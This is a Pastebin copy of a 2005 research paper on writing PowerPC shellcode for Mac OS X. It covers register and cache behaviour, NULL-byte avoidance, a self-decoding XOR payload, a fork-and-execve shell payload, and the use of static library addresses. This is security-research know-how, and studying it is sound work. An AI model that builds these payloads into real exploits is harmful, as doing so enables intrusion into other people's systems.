Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ; # ------------------------------------------------------------------------------------------------------ # ;
- Mac OS X PPC Shellcode Tricks
- H D Moore
- hdm[at]metasploit.com
- Last modified: 05/09/2005
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 0) Foreword
- Abstract:
- Developing shellcode for Mac OS X is not particularly difficult, but there are
- a number of tips and techniques that can make the process easier and more eff
- ective. The independent data and instruction caches of the PowerPC processor
- can cause a variety of problems with exploit and shellcode development. The
- common practice of patching opcodes at run-time is much more involved when the
- instruction cache is in incoherent mode. NULL-free shellcode can be improved by
- taking advantage of index registers and the reserved bits found in many
- opcodes, saving space otherwise taken by standard NULL evasion techniques. The
- Mac OS X operating system introduces a few challenges to unsuspecting
- developers; system calls change their return address based on whether they
- succeed and oddities in the Darwin kernel can prevent standard execve()
- shellcode from working properly with a threaded process. The virtual memory
- layout on Mac OS X can be abused to overcome instruction cache obstacles and
- develop even smaller shellcode.
- Thanks:
- The author would like to thank B-r00t, Dino Dai Zovi, LSD, Palante, Optyx, and
- the entire Uninformed Journal staff.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 1) Introduction
- With the introduction of Mac OS X, Apple has been viewed with mixed feelings by
- the security community. On one hand, the BSD core offers the familiar Unix
- security model that security veterans already understand. On the other, the
- amount of proprietary extensions, network-enabled software, and growing mass of
- advisories is giving some a cause for concern. Exploiting buffer overflows,
- format strings, and other memory-corruption vulnerabilities on Mac OS X is a
- bit different from what most exploit developers are familiar with. The
- incoherent instruction cache, combined with the RISC fixed-length instruction
- set, raises the bar for exploit and payload developers.
- On September 12th of 2003, B-r00t published a paper titled "Smashing the Mac
- for Fun and Profit". B-root's paper covered the basics of Mac OS X shellcode
- development and built on the PowerPC work by LSD, Palante, and Ghandi. This
- paper is an attempt to extend, rather than replace, the material already
- available on writing shellcode for the Mac OS X operating system. The first
- section covers the fundamentals of the PowerPC architecture and what you need
- to know to start writing shellcode. The second section focuses on avoiding NULL
- bytes and other characters through careful use of the PowerPC instruction set.
- The third section investigates some of the unique behavior of the Mac OS X
- platform and introduces some useful techniques.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 2) PowerPC Basics
- The PowerPC (PPC) architecture uses a reduced instruction set consisting of
- 32-bit fixed-width opcodes. Each opcode is exactly four bytes long and can only
- be executed by the processor if the opcode is word-aligned in memory.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 2.1) Registers
- PowerPC processors have thirty-two 32-bit general-purpose registers (r0-r31)
- PowerPC 64-bit processors have 64-bit general-purpose registers, but still use
- 32-bit opcodes, thirty-two 64-bit floating-point registers (f0-f31), a link
- register (lr), a count register (ctr), and a handful of other registers for
- tracking things like branch conditions, integer overflows, and various machine
- state flags. Some PowerPC processors also contain a vector-processing unit
- (AltiVec, etc), which can add another thirty-two 128-bit registers to the set.
- On the Darwin/Mac OS X platform, r0 is used to store the system call number, r1
- is used as a stack pointer, and r3 to r7 are used to pass arguments to a system
- call. General-purpose registers between r3 and r12 are considered volatile and
- should be preserved before the execution of any system call or library
- function.
- ;;
- ;; Demonstrate execution of the reboot system call
- ;;
- main:
- li r0, 55 ; #define SYS_reboot 55
- sc
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 2.2) Branches
- Unlike the IA32 platform, PowerPC does not have a call or jmp instruction.
- Execution flow is controlled by one of the many branch instructions. A branch
- can redirect execution to a relative address, absolute address, or the value
- stored in either the link or count registers. Conditional branches are
- performed based on one of four bit fields in the condition register. The count
- register can also be used as a condition for branching and some instructions
- will automatically decrement the count register. A branch instruction can
- automatically set the link register to be the address following the branch,
- which is a very simple way to get the absolute address of any relative location
- in memory.
- ;;
- ;; Demonstrate GetPC() through a branch and link instruction
- ;;
- main:
- xor. r5, r5, r5 ; xor r5 with r5, storing the value in r5
- ; the condition register is updated by the . modifier
- ppcGetPC:
- bnel ppcGetPC ; branch if condition is not-equal, which will be false
- ; the address of ppcGetPC+4 is now in the link register
- mflr r5 ; move the link register to r5, which points back here
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 2.3) Memory
- Memory access on PowerPC is performed through the load and store instructions.
- Immediate values can be loaded to a register or stored to a location in memory,
- but the immediate value is limited to 16 bits. When using a load instruction on
- a non-immediate value, a base register is used, followed by an offset from that
- register to the desired location. Store instructions work in a similar fashion;
- the value to be stored is placed into a register, and the store instruction
- then writes that value to the destination register plus an offset value.
- Multi-word memory instructions exist, but are considered bad practice to use,
- since they may not be supported in future PowerPC processors.
- Since each PowerPC instruction is 32 bits wide, it is not possible to load a
- 32-bit address into a register with a single instruction. The standard method
- of loading a full 32-bit value requires a load-immediate-shift (lis) followed
- by an or-immediate (ori). The first instruction loads the high 16 bits, while
- the second loads the lower 16 bits Some people prefer to use
- add-immediate-shift against the r0 general purpose register. The r0 register
- has a special property in that anytime it is used for addition or substraction,
- it is treated as a zero, regardless of the current value 64-bit PowerPC
- processors require five separate instructions to load a 32-bit immediate value
- into a general-purpose register. This 16-bit limitation also applies to
- relative branches and every other instruction that uses an immediate value.
- ;;
- ;; Load a 32-bit immediate value and store it to the stack
- ;;
- main:
- lis r5, 0x1122 ; load the high bits of the value
- ; r5 contains 0x11220000
- ori r5, r5, 0x3344 ; load the low bits of the value
- ; r5 now contains 0x11223344
- stw r5, 20(r1) ; store this value to SP+20
- lwz r3, 20(r1) ; load this value back to r3
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 2.4) L1 Cache
- The PowerPC processor uses one or more on-chip memory caches to accelerate
- access to frequently referenced data and instructions. This cache memory is
- separated into a distinct data and instruction cache. Although the data cache
- operates in coherent mode on Mac OS X, shellcode developers need to be aware of
- how the data cache and the instruction cache interoperate when executing
- self-modifying code.
- As a superscalar architecture, the PowerPC processor contains multiple
- execution units, each of which has a pipeline. The pipeline can be described as
- a conveyor belt in a factory; as an instruction moves down the belt, specific
- steps are performed. To increase the efficiency of the pipeline, multiple
- instructions can put on the belt at the same time, one behind another. The
- processor will attempt to predict which direction a branch instruction will
- take and then feed the pipeline with instructions from the predicted path. If
- the prediction was wrong, the contents of the pipeline are trashed and correct
- instructions are loaded into the pipeline instead.
- This pipelined execution means that more than one instruction can be processed
- at the same time in each execution unit. If one instruction requires the output
- of another, a gap can occur in the pipeline while these dependencies are
- satisfied. In the case of store instruction, the contents of the data cache
- will be updated before the results are flushed back to main memory. If a load
- instruction is executed directly after the store, it will obtain the
- newly-updated value. This occurs because the load instruction will read the
- value from the data cache, where it has already been updated.
- The instruction cache is a different beast altogether. On the PowerPC platform,
- the instruction cache is incoherent. If an executable region of memory is
- modified and that region is already loaded into the instruction cache, the
- modifed instructions will not be executed unless the cache is specifically
- flushed. The instruction cache is filled from main memory, not the data cache.
- If you attempt to modify executable code through a store instruction, flush the
- cache, and then attempt to execute that code, there is still a chance that the
- original, unmodified code will be executed instead. This can occur because the
- data cache was not flushed back to main memory before the instruction cache was
- filled.
- The solution is a bit tricky, you must use the "dcbf" instruction to invalidate
- each block of memory from the data cache, wait for the invalidation to complete
- with the "sync" instruction, and then flush the instruction cache for that
- block with "icbi". Finally, the "isync" instruction needs to be executed before
- the modified code is actually used. Placing these instructions in any other
- order may result in stale data being left in the instruction cache. Due to
- these restrictions, self-modifying shellcode on the PowerPC platform is rare
- and often unreliable.
- The example below is a working PowerPC shellcode decoder included with the
- Metasploit Framework (OSXPPCLongXOR).
- ;;
- ;; Demonstrate a cache-safe payload decoder
- ;; Based on Dino Dai Zovi's PPC decoder (20030821)
- ;;
- main:
- xor. r5, r5, r5 ; Ensure that the cr0 flag is always 'equal'
- bnel main ; Branch if cr0 is not-equal and link to LMain
- mflr r31 ; Move the address of LMain into r31
- addi r31, r31, 68+1974 ; 68 = distance from branch -> payload
- ; 1974 is null eliding constant
- subi r5, r5, 1974 ; We need this for the dcbf and icbi
- lis r6, 0x9999 ; XOR key = hi16(0x99999999)
- ori r6, r6, 0x9999 ; XOR key = lo16(0x99999999)
- addi r4, r5, 1974 + 4 ; Move the number of words to code into r4
- mtctr r4 ; Set the count register to the word count
- xorlp:
- lwz r4, -1974(r31) ; Load the encoded word into memory
- xor r4, r4, r6 ; XOR this word against our key in r6
- stw r4, -1974(r31) ; Store the modified work back to memory
- dcbf r5, r31 ; Flush the modified word to main memory
- .long 0x7cff04ac ; Wait for the data block flush (sync)
- icbi r5, r31 ; Invalidate prefetched block from i-cache
- subi r30, r5, -1978 ; Move to next word without using a NULL
- add. r31, r31, r30
- bdnz- xorlp ; Branch if --count == 0
- .long 0x4cff012c ; Wait for i-cache to synchronize (isync)
- ; Insert XORed payload here
- .long (0x7fe00008 ^ 0x99999999)
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 3) Avoiding NULLs
- One of the most common problems encountered with shellcode development in
- general and RISC processors in particular is avoiding NULL bytes in the
- assembled code. On the IA32 platform, NULL bytes are fairly easy to dodge,
- mostly due to the variable-length instruction set and multiple opcodes
- available for a given task. Fixed-width opcode architectures, like PowerPC,
- have fixed field sizes and often pad those fields with all zero bits.
- Instructions that have a set of undefined bits often set these bits to zero as
- well. The result is that many of the available opcodes are impossible to use
- with NULL-free shellcode without modification.
- On many platforms, self-modifying code can be used to work around NULL byte
- restrictions. This technique is not useful for single-instruction patching on
- PowerPC, since the instruction pre-fetch and instruction cache can result in
- the non-modified instruction being executed instead.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 3.1) Undefined Bits
- To write interesting shellcode for Mac OS X, you need to use system calls. One
- of the first problems encountered with the PowerPC platform is that the system
- call instruction assembles to 0x44000002, which contains two NULL bytes. If we
- take a look at the IBM PowerPC reference for the 'sc' instruction, we see that
- the bit layout is as follows:
- 010001 00000 00000 0000 0000000 000 1 0
- ------ ----- ----- ---- ------- --- - -
- A B C D E F G H
- These 32 bits are broken down into eight specific fields. The first field (A),
- which is 5 bits wide, must be set to the value 17. The bits that make up B, C,
- and D are all marked as undefined. Field E is must either be set to 1 or 0.
- Fields F and H are undefined, and G must always be set to 1. We can modify the
- undefined bits to anything we like, in order to make the corresponding byte
- values NULL-free. The first step is to reorder these bits along byte boundaries
- and mark what we are able to change.
- ? = undefined
- # = zero or one
- [010001??] [????????] [????0000] [00#???1?]
- The first byte of this instruction can be either 68, 69, 70, or 71 (DEFG). The
- second byte can be any character at all. The third byte can either be 0, 16,
- 32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, or 240 (which
- contains '0', 'P', and 'p', among others). The fourth value can be any of the
- following values: 2, 3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31,
- 34, 35, 38, 39, 42, 43, 46, 47, 50, 51, 54, 55, 58, 59, 62, 63. As you can see,
- it is possible to create thousands of different opcodes that are all treated by
- the processor as a system call. The same technique can be applied to almost any
- other instruction that has undefined bits. Although the current line of PowerPC
- chips used with Mac OS X seem to ignore the undefined bits, future processors
- may actually use these bits. It is entirely possible that undefined bit abuse
- can prevent your code from working on newer processors
- ;;
- ;; Patching the undefined bits in the 'sc' opcode
- ;;
- main:
- li r0, 1 ; sys_exit
- li r3, 0 ; exit status
- .long 0x45585037 ; sc patched as "EXP7"
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 3.2) Index Registers
- On the PowerPC platform, immediate values are encoded using all 16 bits. If the
- assembled value of your immediate contains a NULL, you will need to find another
- way to load it into the target register. The most common technique is to first
- load a NULL-free value into a register, then substract that value minus the
- difference to your immediate.
- ;;
- ;; Demonstrate index register usage
- ;;
- main:
- li r7, 1999 ; place a NULL-free value into the index
- subi r5, r7, 1999-1 ; substract our value minus the target
- ; the r5 register is now set to 1
- If you have a rough idea of the immediate values you will need in your
- shellcode, you can take this a step further. Set your initial index register to
- a value, that when decremented by the immediate value, actually results in a
- character of your choice. If you have two distant ranges (1-10 and 50-60), then
- consider using two index registers. The example below demonstrates an index
- register that works for the system call number as well as the arguments,
- leaving the assembled bytes NULL-free. As you can see, besides the four bytes
- required to set the index register, this method does not significantly increase
- the size of the code.
- ;;
- ;; Create a TCP socket without NULL bytes
- ;;
- main:
- li r7, 0x3330 ; 0x38e03330 = NULL-free index value
- subi r0, r7, 0x3330-97 ; 0x3807cd31 = system call for sys_socket
- subi r3, r7, 0x3330-2 ; 0x3867ccd2 = socket domain
- subi r4, r7, 0x3330-1 ; 0x3887ccd1 = socket type
- subi r5, r7, 0x3330-6 ; 0x38a7ccd6 = socket protocol
- .long 0x45585037 ; patched 'sc' instruction
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 3.3) Branching
- Branching to a forward address without using NULL bytes can be tricky on
- PowerPC systems. If you try branching forward, but less than 256 bytes, your
- opcode will contain a NULL. If you obtain your current address and want to
- branch to an offset from it, you will need to place the target address into the
- count register (ctr) or the link register (lr). If you decide to use the link
- register, you will notice that every valid form of "blr" has a NULL byte. You
- can avoid the NULL byte by setting the branch hint bits (19-20) to "11"
- (unpredictable branch, do not optimize). The resulting opcode becomes
- 0x4e804820 instead of 0x4e800020 for the standard "blr" instruction.
- The branch prediction bit (bit 10) can also come in handy, it is useful if you
- need to change the second byte of the branch instruction to a different
- character. The prediction bit tells the processor how likely it is that the
- instruction will result in a branch. To specify the branch prediction bit in
- the assembly source, just place '-' or '+' after the branch instruction.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 4) Mac OS X Tricks
- This section describes a handful of tips and tricks for writing shellcode on
- the Mac OS X platform.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 4.1) Diagnostic Tools
- Mac OS X includes a solid collection of development and diagnostic tools, many
- of which are invaluable for shellcode and exploit development. The list below
- describes some of the most commonly used tools and how they relate to shellcode
- development.
- Xcode: This package includes 'gdb', 'gcc', and 'as'. Sadly, objdump is not
- included and most disassembly needs to be done with 'gdb' or 'otool'.
- ktrace: The ktrace and kdump tools are equivalent to strace on Linux and truss
- on Solaris. There is no better tool for quickly diagnosing shellcode
- bugs.
- vmmap: If you were looking for the equivalent of /proc/pid/maps, you found it.
- Use vmmap to figure out where the heap, library, and stacks are mapped.
- crashreporterd: This daemon runs by default and creates very nice crash dumps
- when a system service dies. Invaluable for finding 0-day in Mac OS X
- services. The crashdump logs can be found in /Library/Logs/CrashReporter.
- heap: Quickly list all heaps in a process. This can be handy when the
- instruction cache prevents a direct return and you need to find an
- alternate shellcode location.
- otool: List all libraries linked to a given binary, disassemble mach-o
- binaries, and display the contents of any section of an executable or
- library. This is the equivalent of 'ldd' and 'objdump' rolled into a
- single utility
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 4.2) System Call Failure
- An interesting feature of Mac OS X is that a successful system call will return
- to the address 4 bytes after the end of 'sc' instruction and a failed system
- call will return directly after the 'sc' instruction. This allows you to
- execute a specific instruction only when the system call fails. The most common
- application of this feature is to branch to an error handler, although it can
- also be used to set a flag or a return value. When writing shellcode, this
- feature is usually more annoying than anything else, since it boosts the size
- of your code by four bytes per system call. In some cases though, this feature
- can be used to shave an instruction or two off the final payload.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 4.3) Threads and Execve
- Mac OS X has an undocumented behavior concerning the execve() system call
- inside a threaded process. If a process tries to call execve() and has more
- than one active thread, the kernel returns the error EOPNOTSUPP. After a closer
- look at kernexec.c in the Darwin XNU source code, it becomes apparent that for
- shellcode to function properly inside a threaded process, it will need to call
- either fork() or vfork() before calling execve().
- ;;
- ;; Fork and execute a command shell
- ;;
- main:
- _fork:
- li r0, 2
- sc
- b _exitproc
- _execsh: ; based on ghandi's execve
- xor. r5, r5, r5
- bnel _execsh
- mflr r3
- addi r3, r3, 32 ; 32
- stw r3, -8(r1) ; argv[0] = path
- stw r5, -4(r1) ; argv[1] = NULL
- subi r4, r1, 8 ; r4 = {path, 0}
- li r0, 59
- sc ; execve(path, argv, NULL)
- b _exitproc
- _path:
- .ascii "/bin/csh" ; csh handles seteuid() for us
- .long 0
- _exitproc:
- li r0, 1
- li r3, 0
- sc
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 4.4) Shared Libraries
- The Mac OS X user community tends to have one thing in common -- they keep
- their systems up to date. The Apple Software Update service, once enabled, is
- very insistent about installing new software releases as they become available.
- The result is that nearly every single Mac OS X system has the exact same
- binaries. System libraries are often loaded at the exact same virtual address
- across all applications. In this sense, Mac OS X is starting to resemble the
- Windows platform.
- If all processes on all Mac OS X system have the same virtual addresses for the
- same libraries, Windows-style shellcode starts to become possible. Assuming you
- can find the right argument-setting code in a shared library, return-to-library
- payloads also become much more feasible. These libraries can be used as return
- addresses, similar to how Windows exploits often return back to a loaded DLL.
- Some useful addresses are listed below:
- 0x90000000: The base address of the system library (libSystem.B.dylib), most
- of the function locations are static across all versions of OS X.
- 0xffff8000: The base address of the "common" page. A number of useful
- functions and instructions can be found here. These functions
- include memcpy, sysdcacheflush, sysicacheinvalidate, and bcopy.
- The following NULL-free example uses the sysicacheinvalidate function to flush
- 1040 bytes from the instruction cache, starting at the address of the payload:
- ;;
- ;; Flush the instruction cache in 32 bytes
- ;;
- main:
- _main:
- xor. r5, r5, r5
- bnel main
- mflr r3
- ;; flush 1040 bytes starting after the branch
- li r4, 1024+16
- ;; 0xffff8520 is __sys_icache_invalidate()
- addis r8, r5, hi16(0xffff8520)
- ori r8, r8, lo16(0xffff8520)
- mtctr r8
- bctrl
- ; # ------------------------------------------------------------------------------------------------------ # ;
- 5) Conclusion
- In the first section, we covered the fundamentals of the PowerPC platform and
- described the syscall calling convention used on the Darwin/Mac OS X platform.
- The second section introduced a few techniques for removing NULL bytes from
- some common instructions. In the third section, we presented some of the tools
- and techniques that can be useful for shellcode development.
- ; # ------------------------------------------------------------------------------------------------------ # ;
- Bibliography
- B-r00t PowerPC / OSX (Darwin) Shellcode Assembly.
- http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf
- Bunda, Potter, Shadowen Powerpc Microprocessor Developer\'s Guide.
- http://www.amazon.com/exec/obidos/tg/detail/-/0672305437/
- Steve Heath Newnes Power PC Programming Pocket Book.
- http://www.amazon.com/exec/obidos/tg/detail/-/0750621117/
- IBM PowerPC Assembler Language Reference.
- http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/mastertoc.htm
- ; # ------------------------------------------------------------------------------------------------------ # ;
- SRC: https://hdm.io/writing/uninformed_1_macosx_ppc_shellcode.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement